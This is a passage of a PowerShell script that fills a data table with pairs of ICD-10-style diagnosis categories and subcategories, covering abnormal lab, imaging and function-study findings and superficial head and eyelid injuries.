in blood") + $null = $DiagnosisList.Rows.Add("Findings of drugs and other substances, not normally found in blood","Finding of opiate drug in blood") + $null = $DiagnosisList.Rows.Add("Findings of drugs and other substances, not normally found in blood","Finding of cocaine in blood") + $null = $DiagnosisList.Rows.Add("Findings of drugs and other substances, not normally found in blood","Finding of hallucinogen in blood") + $null = $DiagnosisList.Rows.Add("Findings of drugs and other substances, not normally found in blood","Finding of other drugs of addictive potential in blood") + $null = $DiagnosisList.Rows.Add("Findings of drugs and other substances, not normally found in blood","Finding of other psychotropic drug in blood") + $null = $DiagnosisList.Rows.Add("Findings of drugs and other substances, not normally found in blood","Finding of steroid agent in blood") + $null = $DiagnosisList.Rows.Add("Finding of abnormal level of heavy metals in blood","Abnormal lead level in blood") + $null = $DiagnosisList.Rows.Add("Finding of abnormal level of heavy metals in blood","Finding of abnormal level of heavy metals in blood") + $null = $DiagnosisList.Rows.Add("Finding of other specified substances, not normally found in blood","Bacteremia") + $null = $DiagnosisList.Rows.Add("Finding of other specified substances, not normally found in blood","Finding of other specified substances, not normally found in blood") + $null = $DiagnosisList.Rows.Add("Finding of unspecified substance, not normally found in blood","Finding of unspecified substance, not normally found in blood") + $null = $DiagnosisList.Rows.Add("Other abnormal findings of blood chemistry","Abnormal level of blood mineral") + $null = $DiagnosisList.Rows.Add("Other abnormal findings of blood chemistry","Abnormal coagulation profile") + $null = $DiagnosisList.Rows.Add("Other specified abnormal findings of blood chemistry","Abnormal blood-gas level") + $null = $DiagnosisList.Rows.Add("Other specified abnormal findings of blood chemistry","Elevated C-reactive protein (CRP)") + $null = $DiagnosisList.Rows.Add("Other specified abnormal findings of blood chemistry","Other specified abnormal findings of blood chemistry") + $null = $DiagnosisList.Rows.Add("Abnormal finding of blood chemistry, unspecified","Abnormal finding of blood chemistry, unspecified") + $null = $DiagnosisList.Rows.Add("Proteinuria","Isolated proteinuria") + $null = $DiagnosisList.Rows.Add("Proteinuria","Persistent proteinuria, unspecified") + $null = $DiagnosisList.Rows.Add("Proteinuria","Orthostatic proteinuria, unspecified") + $null = $DiagnosisList.Rows.Add("Proteinuria","Bence Jones proteinuria") + $null = $DiagnosisList.Rows.Add("Proteinuria","Other proteinuria") + $null = $DiagnosisList.Rows.Add("Proteinuria","Proteinuria, unspecified") + $null = $DiagnosisList.Rows.Add("Glycosuria","Glycosuria") + $null = $DiagnosisList.Rows.Add("Other and unspecified abnormal findings in urine","Chyluria") + $null = $DiagnosisList.Rows.Add("Other and unspecified abnormal findings in urine","Myoglobinuria") + $null = $DiagnosisList.Rows.Add("Other and unspecified abnormal findings in urine","Biliuria") + $null = $DiagnosisList.Rows.Add("Other and unspecified abnormal findings in urine","Hemoglobinuria") + $null = $DiagnosisList.Rows.Add("Other and unspecified abnormal findings in urine","Acetonuria") + $null = $DiagnosisList.Rows.Add("Other and unspecified abnormal findings in urine","Elevated urine levels of drugs, medicaments and biological substances") + $null = $DiagnosisList.Rows.Add("Other and unspecified abnormal findings in urine","Abnormal urine levels of substances chiefly nonmedicinal as to source") + $null = $DiagnosisList.Rows.Add("Abnormal findings on microbiological examination of urine","Bacteriuria") + $null = $DiagnosisList.Rows.Add("Abnormal findings on microbiological examination of urine","Other abnormal findings on microbiological examination of urine") + $null = $DiagnosisList.Rows.Add("Abnormal findings on cytological and histological examination of urine","Abnormal findings on cytological and histological examination of urine") + $null = $DiagnosisList.Rows.Add("Other and unspecified abnormal findings in urine","Unspecified abnormal findings in urine") + $null = $DiagnosisList.Rows.Add("Other and unspecified abnormal findings in urine","Other chromoabnormalities of urine") + $null = $DiagnosisList.Rows.Add("Other and unspecified abnormal findings in urine","Other abnormal findings in urine") + $null = $DiagnosisList.Rows.Add("Abnormal findings in cerebrospinal fluid","Abnormal level of enzymes in cerebrospinal fluid") + $null = $DiagnosisList.Rows.Add("Abnormal findings in cerebrospinal fluid","Abnormal level of hormones in cerebrospinal fluid") + $null = $DiagnosisList.Rows.Add("Abnormal findings in cerebrospinal fluid","Abnormal level of other drugs, medicaments and biological substances in cerebrospinal fluid") + $null = $DiagnosisList.Rows.Add("Abnormal findings in cerebrospinal fluid","Abnormal level of substances chiefly nonmedicinal as to source in cerebrospinal fluid") + $null = $DiagnosisList.Rows.Add("Abnormal findings in cerebrospinal fluid","Abnormal immunological findings in cerebrospinal fluid") + $null = $DiagnosisList.Rows.Add("Abnormal findings in cerebrospinal fluid","Abnormal microbiological findings in cerebrospinal fluid") + $null = $DiagnosisList.Rows.Add("Abnormal findings in cerebrospinal fluid","Abnormal cytological findings in cerebrospinal fluid") + $null = $DiagnosisList.Rows.Add("Abnormal findings in cerebrospinal fluid","Other abnormal findings in cerebrospinal fluid") + $null = $DiagnosisList.Rows.Add("Abnormal findings in cerebrospinal fluid","Unspecified abnormal finding in cerebrospinal fluid") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from respiratory organs and thorax","Abnormal level of enzymes in specimens from respiratory organs and thorax") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from respiratory organs and thorax","Abnormal level of hormones in specimens from respiratory organs and thorax") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from respiratory organs and thorax","Abnormal level of other drugs, medicaments and biological substances in specimens from respiratory organs and thorax") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from respiratory organs and thorax","Abnormal level of substances chiefly nonmedicinal as to source in specimens from respiratory organs and thorax") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from respiratory organs and thorax","Abnormal immunological findings in specimens from respiratory organs and thorax") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from respiratory organs and thorax","Abnormal microbiological findings in specimens from respiratory organs and thorax") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from respiratory organs and thorax","Abnormal cytological findings in specimens from respiratory organs and thorax") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from respiratory organs and thorax","Abnormal histological findings in specimens from respiratory organs and thorax") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from respiratory organs and thorax","Other abnormal findings in specimens from respiratory organs and thorax") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from respiratory organs and thorax","Unspecified abnormal finding in specimens from respiratory organs and thorax") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from digestive organs and abdominal cavity","Abnormal level of enzymes in specimens from digestive organs and abdominal cavity") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from digestive organs and abdominal cavity","Abnormal level of hormones in specimens from digestive organs and abdominal cavity") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from digestive organs and abdominal cavity","Abnormal level of other drugs, medicaments and biological substances in specimens from digestive organs and abdominal cavity") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from digestive organs and abdominal cavity","Abnormal level of substances chiefly nonmedicinal as to source in specimens from digestive organs and abdominal cavity") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from digestive organs and abdominal cavity","Abnormal immunological findings in specimens from digestive organs and abdominal cavity") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from digestive organs and abdominal cavity","Abnormal microbiological findings in specimens from digestive organs and abdominal cavity") + $null = $DiagnosisList.Rows.Add("Abnormal cytologic smear of anus","Atypical squamous cells of undetermined significance on cytologic smear of anus (ASC-US)") + $null = $DiagnosisList.Rows.Add("Abnormal cytologic smear of anus","Atypical squamous cells cannot exclude high grade squamous intraepithelial lesion on cytologic smear of anus (ASC-H)") + $null = $DiagnosisList.Rows.Add("Abnormal cytologic smear of anus","Low grade squamous intraepithelial lesion on cytologic smear of anus (LGSIL)") + $null = $DiagnosisList.Rows.Add("Abnormal cytologic smear of anus","High grade squamous intraepithelial lesion on cytologic smear of anus (HGSIL)") + $null = $DiagnosisList.Rows.Add("Abnormal cytologic smear of anus","Cytologic evidence of malignancy on smear of anus") + $null = $DiagnosisList.Rows.Add("Abnormal cytologic smear of anus","Unsatisfactory cytologic smear of anus") + $null = $DiagnosisList.Rows.Add("Abnormal cytologic smear of anus","Satisfactory anal smear but lacking transformation zone") + $null = $DiagnosisList.Rows.Add("Abnormal cytologic smear of anus","Other abnormal cytological findings on specimens from anus") + $null = $DiagnosisList.Rows.Add("Abnormal cytologic smear of anus","Unspecified abnormal cytological findings in specimens from anus") + $null = $DiagnosisList.Rows.Add("Abnormal cytological findings in specimens from other digestive organs and abdominal cavity","Abnormal cytological findings in specimens from other digestive organs and abdominal cavity") + $null = $DiagnosisList.Rows.Add("Abnormal histological findings in specimens from digestive organs and abdominal cavity","Abnormal histological findings in specimens from digestive organs and abdominal cavity") + $null = $DiagnosisList.Rows.Add("Other abnormal findings in specimens from digestive organs and abdominal cavity","Anal high risk human papillomavirus (HPV) DNA test positive") + $null = $DiagnosisList.Rows.Add("Other abnormal findings in specimens from digestive organs and abdominal cavity","Anal low risk human papillomavirus (HPV) DNA test positive") + $null = $DiagnosisList.Rows.Add("Other abnormal findings in specimens from digestive organs and abdominal cavity","Other abnormal findings in specimens from digestive organs and abdominal cavity") + $null = $DiagnosisList.Rows.Add("Unspecified abnormal finding in specimens from digestive organs and abdominal cavity","Unspecified abnormal finding in specimens from digestive organs and abdominal cavity") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from male genital organs","Abnormal level of enzymes in specimens from male genital organs") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from male genital organs","Abnormal level of hormones in specimens from male genital organs") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from male genital organs","Abnormal level of other drugs, medicaments and biological substances in specimens from male genital organs") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from male genital organs","Abnormal level of substances chiefly nonmedicinal as to source in specimens from male genital organs") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from male genital organs","Abnormal immunological findings in specimens from male genital organs") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from male genital organs","Abnormal microbiological findings in specimens from male genital organs") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from male genital organs","Abnormal cytological findings in specimens from male genital organs") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from male genital organs","Abnormal histological findings in specimens from male genital organs") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from male genital organs","Other abnormal findings in specimens from male genital organs") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from male genital organs","Unspecified abnormal finding in specimens from male genital organs") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from female genital organs","Abnormal level of enzymes in specimens from female genital organs") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from female genital organs","Abnormal level of hormones in specimens from female genital organs") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from female genital organs","Abnormal level of other drugs, medicaments and biological substances in specimens from female genital organs") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from female genital organs","Abnormal level of substances chiefly nonmedicinal as to source in specimens from female genital organs") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from female genital organs","Abnormal immunological findings in specimens from female genital organs") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from female genital organs","Abnormal microbiological findings in specimens from female genital organs") + $null = $DiagnosisList.Rows.Add("Abnormal cytological findings in specimens from cervix uteri","Atypical squamous cells of undetermined significance on cytologic smear of cervix (ASC-US)") + $null = $DiagnosisList.Rows.Add("Abnormal cytological findings in specimens from cervix uteri","Atypical squamous cells cannot exclude high grade squamous intraepithelial lesion on cytologic smear of cervix (ASC-H)") + $null = $DiagnosisList.Rows.Add("Abnormal cytological findings in specimens from cervix uteri","Low grade squamous intraepithelial lesion on cytologic smear of cervix (LGSIL)") + $null = $DiagnosisList.Rows.Add("Abnormal cytological findings in specimens from cervix uteri","High grade squamous intraepithelial lesion on cytologic smear of cervix (HGSIL)") + $null = $DiagnosisList.Rows.Add("Abnormal cytological findings in specimens from cervix uteri","Cytologic evidence of malignancy on smear of cervix") + $null = $DiagnosisList.Rows.Add("Abnormal cytological findings in specimens from cervix uteri","Unsatisfactory cytologic smear of cervix") + $null = $DiagnosisList.Rows.Add("Abnormal cytological findings in specimens from cervix uteri","Satisfactory cervical smear but lacking transformation zone") + $null = $DiagnosisList.Rows.Add("Abnormal cytological findings in specimens from cervix uteri","Other abnormal cytological findings on specimens from cervix uteri") + $null = $DiagnosisList.Rows.Add("Abnormal cytological findings in specimens from cervix uteri","Unspecified abnormal cytological findings in specimens from cervix uteri") + $null = $DiagnosisList.Rows.Add("Abnormal cytological findings in specimens from vagina","Atypical squamous cells of undetermined significance on cytologic smear of vagina (ASC-US)") + $null = $DiagnosisList.Rows.Add("Abnormal cytological findings in specimens from vagina","Atypical squamous cells cannot exclude high grade squamous intraepithelial lesion on cytologic smear of vagina (ASC-H)") + $null = $DiagnosisList.Rows.Add("Abnormal cytological findings in specimens from vagina","Low grade squamous intraepithelial lesion on cytologic smear of vagina (LGSIL)") + $null = $DiagnosisList.Rows.Add("Abnormal cytological findings in specimens from vagina","High grade squamous intraepithelial lesion on cytologic smear of vagina (HGSIL)") + $null = $DiagnosisList.Rows.Add("Abnormal cytological findings in specimens from vagina","Cytologic evidence of malignancy on smear of vagina") + $null = $DiagnosisList.Rows.Add("Abnormal cytological findings in specimens from vagina","Unsatisfactory cytologic smear of vagina") + $null = $DiagnosisList.Rows.Add("Abnormal cytological findings in specimens from vagina","Other abnormal cytological findings on specimens from vagina") + $null = $DiagnosisList.Rows.Add("Abnormal cytological findings in specimens from vagina","Unspecified abnormal cytological findings in specimens from vagina") + $null = $DiagnosisList.Rows.Add("Abnormal cytological findings in specimens from other female genital organs","Abnormal cytological findings in specimens from other female genital organs") + $null = $DiagnosisList.Rows.Add("Abnormal histological findings in specimens from female genital organs","Abnormal histological findings in specimens from female genital organs") + $null = $DiagnosisList.Rows.Add("High risk human papillomavirus (HPV) DNA test positive from female genital organs","Cervical high risk human papillomavirus (HPV) DNA test positive") + $null = $DiagnosisList.Rows.Add("High risk human papillomavirus (HPV) DNA test positive from female genital organs","Vaginal high risk human papillomavirus (HPV) DNA test positive") + $null = $DiagnosisList.Rows.Add("Low risk human papillomavirus (HPV) DNA test positive from female genital organs","Cervical low risk human papillomavirus (HPV) DNA test positive") + $null = $DiagnosisList.Rows.Add("Low risk human papillomavirus (HPV) DNA test positive from female genital organs","Vaginal low risk human papillomavirus (HPV) DNA test positive") + $null = $DiagnosisList.Rows.Add("Other abnormal findings in specimens from female genital organs","Other abnormal findings in specimens from female genital organs") + $null = $DiagnosisList.Rows.Add("Unspecified abnormal finding in specimens from female genital organs","Unspecified abnormal finding in specimens from female genital organs") + $null = $DiagnosisList.Rows.Add("Abnormal findings in other body fluids and substances","Cloudy (hemodialysis) (peritoneal) dialysis effluent") + $null = $DiagnosisList.Rows.Add("Abnormal findings in other body fluids and substances","Abnormal findings in other body fluids and substances") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from other organs, systems and tissues","Abnormal level of enzymes in specimens from other organs, systems and tissues") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from other organs, systems and tissues","Abnormal level of hormones in specimens from other organs, systems and tissues") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from other organs, systems and tissues","Abnormal level of other drugs, medicaments and biological substances in specimens from other organs, systems and tissues") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from other organs, systems and tissues","Abnormal level of substances chiefly nonmedicinal as to source in specimens from other organs, systems and tissues") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from other organs, systems and tissues","Abnormal immunological findings in specimens from other organs, systems and tissues") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from other organs, systems and tissues","Abnormal microbiological findings in specimens from other organs, systems and tissues") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from other organs, systems and tissues","Abnormal cytological findings in specimens from other organs, systems and tissues") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from other organs, systems and tissues","Abnormal histological findings in specimens from other organs, systems and tissues") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from other organs, systems and tissues","Other abnormal findings in specimens from other organs, systems and tissues") + $null = $DiagnosisList.Rows.Add("Abnormal findings in specimens from other organs, systems and tissues","Unspecified abnormal finding in specimens from other organs, systems and tissues") + $null = $DiagnosisList.Rows.Add("Abnormal findings on diagnostic imaging of central nervous system","Intracranial space-occupying lesion found on diagnostic imaging of central nervous system") + $null = $DiagnosisList.Rows.Add("Other abnormal findings on diagnostic imaging of central nervous system","Abnormal echoencephalogram") + $null = $DiagnosisList.Rows.Add("Other abnormal findings on diagnostic imaging of central nervous system","White matter disease, unspecified") + $null = $DiagnosisList.Rows.Add("Other abnormal findings on diagnostic imaging of central nervous system","Other abnormal findings on diagnostic imaging of central nervous system") + $null = $DiagnosisList.Rows.Add("Abnormal findings on diagnostic imaging of lung","Solitary pulmonary nodule") + $null = $DiagnosisList.Rows.Add("Abnormal findings on diagnostic imaging of lung","Other nonspecific abnormal finding of lung field") + $null = $DiagnosisList.Rows.Add("Abnormal and inconclusive findings on diagnostic imaging of breast","Mammographic microcalcification found on diagnostic imaging of breast") + $null = $DiagnosisList.Rows.Add("Abnormal and inconclusive findings on diagnostic imaging of breast","Mammographic calcification found on diagnostic imaging of breast") + $null = $DiagnosisList.Rows.Add("Abnormal and inconclusive findings on diagnostic imaging of breast","Inconclusive mammogram") + $null = $DiagnosisList.Rows.Add("Abnormal and inconclusive findings on diagnostic imaging of breast","Other abnormal and inconclusive findings on diagnostic imaging of breast") + $null = $DiagnosisList.Rows.Add("Abnormal findings on diagnostic imaging of other body structures","Abnormal findings on diagnostic imaging of skull and head, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Abnormal findings on diagnostic imaging of other body structures","Abnormal findings on diagnostic imaging of heart and coronary circulation") + $null = $DiagnosisList.Rows.Add("Abnormal findings on diagnostic imaging of other body structures","Abnormal findings on diagnostic imaging of liver and biliary tract") + $null = $DiagnosisList.Rows.Add("Abnormal findings on diagnostic imaging of other body structures","Abnormal findings on diagnostic imaging of other parts of digestive tract") + $null = $DiagnosisList.Rows.Add("Abnormal findings on diagnostic imaging of urinary organs","Abnormal radiologic findings on diagnostic imaging of renal pelvis, ureter, or bladder") + $null = $DiagnosisList.Rows.Add("Abnormal radiologic findings on diagnostic imaging of kidney","Abnormal radiologic findings on diagnostic imaging of right kidney") + $null = $DiagnosisList.Rows.Add("Abnormal radiologic findings on diagnostic imaging of kidney","Abnormal radiologic findings on diagnostic imaging of left kidney") + $null = $DiagnosisList.Rows.Add("Abnormal radiologic findings on diagnostic imaging of kidney","Abnormal radiologic findings on diagnostic imaging of unspecified kidney") + $null = $DiagnosisList.Rows.Add("Abnormal radiologic findings on diagnostic imaging of other urinary organs","Abnormal radiologic findings on diagnostic imaging of other urinary organs") + $null = $DiagnosisList.Rows.Add("Abnormal findings on diagnostic imaging of other abdominal regions, including retroperitoneum","Abnormal findings on diagnostic imaging of other abdominal regions, including retroperitoneum") + $null = $DiagnosisList.Rows.Add("Abnormal findings on diagnostic imaging of limbs","Abnormal findings on diagnostic imaging of limbs") + $null = $DiagnosisList.Rows.Add("Abnormal findings on diagnostic imaging of other parts of musculoskeletal system","Abnormal findings on diagnostic imaging of other parts of musculoskeletal system") + $null = $DiagnosisList.Rows.Add("Abnormal findings on diagnostic imaging of other specified body structures","Abnormal findings on diagnostic imaging of other specified body structures") + $null = $DiagnosisList.Rows.Add("Diagnostic imaging inconclusive due to excess body fat of patient","Diagnostic imaging inconclusive due to excess body fat of patient") + $null = $DiagnosisList.Rows.Add("Abnormal results of function studies of central nervous system","Abnormal electroencephalogram [EEG]") + $null = $DiagnosisList.Rows.Add("Abnormal results of function studies of central nervous system","Abnormal brain scan") + $null = $DiagnosisList.Rows.Add("Abnormal results of function studies of central nervous system","Abnormal results of other function studies of central nervous system") + $null = $DiagnosisList.Rows.Add("Abnormal results of function studies of eye","Abnormal electro-oculogram [EOG]") + $null = $DiagnosisList.Rows.Add("Abnormal results of function studies of eye","Abnormal electroretinogram [ERG]") + $null = $DiagnosisList.Rows.Add("Abnormal results of function studies of eye","Abnormal visually evoked potential [VEP]") + $null = $DiagnosisList.Rows.Add("Abnormal results of function studies of eye","Abnormal oculomotor study") + $null = $DiagnosisList.Rows.Add("Abnormal results of function studies of eye","Abnormal results of other function studies of eye") + $null = $DiagnosisList.Rows.Add("Abnormal results of function studies of ear and other special senses","Abnormal auditory function study") + $null = $DiagnosisList.Rows.Add("Abnormal results of function studies of ear and other special senses","Abnormal vestibular function study") + $null = $DiagnosisList.Rows.Add("Abnormal results of function studies of ear and other special senses","Abnormal results of other function studies of ear and other special senses") + $null = $DiagnosisList.Rows.Add("Abnormal results of function studies of peripheral nervous system","Abnormal response to nerve stimulation, unspecified") + $null = $DiagnosisList.Rows.Add("Abnormal results of function studies of peripheral nervous system","Abnormal electromyogram [EMG]") + $null = $DiagnosisList.Rows.Add("Abnormal results of function studies of peripheral nervous system","Abnormal results of other function studies of peripheral nervous system") + $null = $DiagnosisList.Rows.Add("Abnormal results of pulmonary function studies","Abnormal results of pulmonary function studies") + $null = $DiagnosisList.Rows.Add("Abnormal results of cardiovascular function studies","Abnormal result of cardiovascular function study, unspecified") + $null = $DiagnosisList.Rows.Add("Abnormal results of cardiovascular function studies","Abnormal electrocardiogram [ECG] [EKG]") + $null = $DiagnosisList.Rows.Add("Abnormal results of cardiovascular function studies","Abnormal result of other cardiovascular function study") + $null = $DiagnosisList.Rows.Add("Abnormal results of kidney function studies","Abnormal results of kidney function studies") + $null = $DiagnosisList.Rows.Add("Abnormal results of liver function studies","Abnormal results of liver function studies") + $null = $DiagnosisList.Rows.Add("Abnormal results of thyroid function studies","Abnormal results of thyroid function studies") + $null = $DiagnosisList.Rows.Add("Abnormal results of other endocrine function studies","Abnormal results of other endocrine function studies") + $null = $DiagnosisList.Rows.Add("Abnormal results of function studies of other organs and systems","Abnormal results of function studies of other organs and systems") + $null = $DiagnosisList.Rows.Add("Abnormal tumor markers","Elevated carcinoembryonic antigen [CEA]") + $null = $DiagnosisList.Rows.Add("Abnormal tumor markers","Elevated cancer antigen 125 [CA 125]") + $null = $DiagnosisList.Rows.Add("Elevated prostate specific antigen [PSA]","Elevated prostate specific antigen [PSA]") + $null = $DiagnosisList.Rows.Add("Elevated prostate specific antigen [PSA]","Rising PSA following treatment for malignant neoplasm of prostate") + $null = $DiagnosisList.Rows.Add("Other abnormal tumor markers","Other abnormal tumor markers") + $null = $DiagnosisList.Rows.Add("Ill-defined and unknown cause of mortality","Ill-defined and unknown cause of mortality") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of scalp","Unspecified superficial injury of scalp, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of scalp","Unspecified superficial injury of scalp, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of scalp","Unspecified superficial injury of scalp, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of scalp","Abrasion of scalp, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of scalp","Abrasion of scalp, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of scalp","Abrasion of scalp, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of scalp","Blister (nonthermal) of scalp, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of scalp","Blister (nonthermal) of scalp, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of scalp","Blister (nonthermal) of scalp, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of scalp","Contusion of scalp, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of scalp","Contusion of scalp, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of scalp","Contusion of scalp, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of part of scalp","External constriction of part of scalp, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of part of scalp","External constriction of part of scalp, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of part of scalp","External constriction of part of scalp, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of scalp","Superficial foreign body of scalp, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of scalp","Superficial foreign body of scalp, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of scalp","Superficial foreign body of scalp, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of scalp","Insect bite (nonvenomous) of scalp, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of scalp","Insect bite (nonvenomous) of scalp, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of scalp","Insect bite (nonvenomous) of scalp, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of scalp","Other superficial bite of scalp, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of scalp","Other superficial bite of scalp, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of scalp","Other superficial bite of scalp, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified eyelid and periocular area","Contusion of unspecified eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified eyelid and periocular area","Contusion of unspecified eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified eyelid and periocular area","Contusion of unspecified eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right eyelid and periocular area","Contusion of right eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right eyelid and periocular area","Contusion of right eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right eyelid and periocular area","Contusion of right eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left eyelid and periocular area","Contusion of left eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left eyelid and periocular area","Contusion of left eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left eyelid and periocular area","Contusion of left eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right eyelid and periocular area","Unspecified superficial injury of right eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right eyelid and periocular area","Unspecified superficial injury of right eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right eyelid and periocular area","Unspecified superficial injury of right eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left eyelid and periocular area","Unspecified superficial injury of left eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left eyelid and periocular area","Unspecified superficial injury of left eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left eyelid and periocular area","Unspecified superficial injury of left eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified eyelid and periocular area","Unspecified superficial injury of unspecified eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified eyelid and periocular area","Unspecified superficial injury of unspecified eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified eyelid and periocular area","Unspecified superficial injury of unspecified eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of right eyelid and periocular area","Abrasion of right eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right eyelid and periocular area","Abrasion of right eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right eyelid and periocular area","Abrasion of right eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of left eyelid and periocular area","Abrasion of left eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left eyelid and periocular area","Abrasion of left eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left eyelid and periocular area","Abrasion of left eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified eyelid and periocular area","Abrasion of unspecified eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified eyelid and periocular area","Abrasion of unspecified eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified eyelid and periocular area","Abrasion of unspecified eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right eyelid and periocular area","Blister (nonthermal) of right eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right eyelid and periocular area","Blister (nonthermal) of right eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right eyelid and periocular area","Blister (nonthermal) of right eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left eyelid and periocular area","Blister (nonthermal) of left eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left eyelid and periocular area","Blister (nonthermal) of left eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left eyelid and periocular area","Blister (nonthermal) of left eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified eyelid and periocular area","Blister (nonthermal) of unspecified eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified eyelid and periocular area","Blister (nonthermal) of unspecified eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified eyelid and periocular area","Blister (nonthermal) of 